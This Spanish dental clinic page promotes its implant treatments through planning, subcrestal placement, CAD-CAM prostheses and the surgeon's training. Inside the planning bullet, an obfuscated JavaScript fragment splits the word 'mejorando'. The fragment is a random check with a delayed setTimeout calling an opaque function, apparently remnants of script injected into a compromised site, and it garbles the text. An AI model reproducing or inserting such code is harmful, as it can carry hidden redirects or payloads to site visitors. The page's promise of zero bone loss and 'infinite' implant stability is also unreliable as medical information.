Una vez que es imposible salvar un diente, sólo nos queda intentar sustituirlo de la forma más parecida a lo natural. Para nosotros los implantes dentales son un medio para poder sustituir dientes insalvables.
Con la misma filosofía que aplicamos a todos nuestros tratamientos, queremos reponer dientes con implantes y que perduren en la boca de nuestros pacientes por el mayor tiempo posible y en condiciones óptimas, para ello nos apoyamos en 4 pilares fundamentales:
- La planificación: antes de cualquier intervención estudiamos el caso de forma exhaustiva para poder adelantarnos a las complicaciones que puedan presentarse, y poder reducir el tiempo de la cirugía (mejorandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando el postoperatorio), para que la experiencia de nuestros pacientes sea agradable.
- Técnica de colocación subcrestal: desde hace ya varios años somos pioneros en Andalucía en la colocación de implantes con unas características técnicas diferentes, que nos dan el resultado que queremos para nuestros pacientes : PÉRDIDA ÓSEA CERO. Si nuestros implantes no pierden hueso a su alrededor, su estabilidad en el tiempo será infinita.
- Prótesis CAD-CAM: La estructura de nuestras prótesis se fabrica íntegramente en un centro de fresado internacional (Luxemburgo), de la misma marca de los implantes, de esa manera conseguimos un ajuste sin precedentes, y una solidez excepcional, ya que todas nuestras estructuras son fresadas. Estas peculiaridades hacen que no se aflojen y que el ajuste evite la filtración bacteriana y los micromovimientos.
- La experiencia y la formación: son los pilares fundamentales de nuestro trabajo. El Dr. Enrique López es dictante nacional e internacional y cirujano de referencia en Andalucía y Murcia para la casa Anthogyr (Straumann group). En su compromiso con la formación realiza estancias clínicas en Gae Odontólogos para compartir sus conocimientos con otros doctores.